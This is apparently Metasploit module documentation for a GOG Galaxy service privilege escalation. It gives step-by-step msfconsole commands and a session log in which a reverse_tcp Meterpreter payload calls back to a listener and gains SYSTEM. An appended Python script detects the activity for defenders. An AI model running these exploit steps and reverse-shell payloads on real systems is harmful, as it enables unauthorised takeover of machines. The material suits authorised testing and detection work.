## Vulnerable Application

GOG Galaxy is a video game management client. One of its Windows services, *GalaxyClientService*, runs with *SYSTEM* privileges.
In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to
execute arbitrary commands as *SYSTEM*.

The target machine only needs to have a vulnerable [version](https://www.gog.com/galaxy) installed to be exploitable.

## Verification Steps

  1. Start *msfconsole*.
  2. Acquire a Meterpreter session.
  3. Do: `use exploit/windows/local/gog_galaxyclientservice_privesc`
  4. Do: `set SESSION <session_no>`
  5. Do: `exploit`
  6. Verify that you get a Meterpreter session.

## Options
### WORKING_DIR

The initial working directory for the command that the service executes.

## Scenarios
### GOG Galaxy Client `v1.2.66.64` on Windows 10

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service.  Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
```
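
Detection logic for the activity in the transcript above, added here as an example and not part of the module or of GOG's software: it triages process-creation events for processes started by the service as *SYSTEM*. Field names follow Sysmon Event ID 1 and the events are constructed; the service binary name, the `<install-dir>` placeholder, and the assumption that the command runs as a direct child of the service are not taken from the page.

```python
import ntpath

# Assumption: the service binary is named after the service.
SERVICE_IMAGE = "galaxyclientservice.exe"
SYSTEM_USER = "nt authority\\system"
# Locations a standard user can normally write to.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")

# Constructed events; <install-dir> is a placeholder, matching is by file name.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe",
     "ParentImage": r"C:\<install-dir>\GalaxyClientService.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\<install-dir>\GalaxyClientService.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Users\space\AppData\Local\Temp\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"DESKTOP-AQT4EG1\space"},
]


def classify(event):
    """Return 'alert', 'review' or None for one process-creation event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent != SERVICE_IMAGE:
        return None  # not started by the service
    if event.get("User", "").lower() != SYSTEM_USER:
        return None  # no elevation involved
    image = event.get("Image", "").lower()
    if any(part in image for part in USER_WRITABLE):
        return "alert"  # SYSTEM process running a user-writable binary
    return "review"  # any other SYSTEM child of the service


def triage(events):
    """Return (severity, image) pairs for the events worth a look."""
    results = []
    for event in events:
        severity = classify(event)
        if severity:
            results.append((severity, event["Image"]))
    return results


if __name__ == "__main__":
    for severity, image in triage(SAMPLE_EVENTS):
        print(f"{severity.upper():7} {image}")
```
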
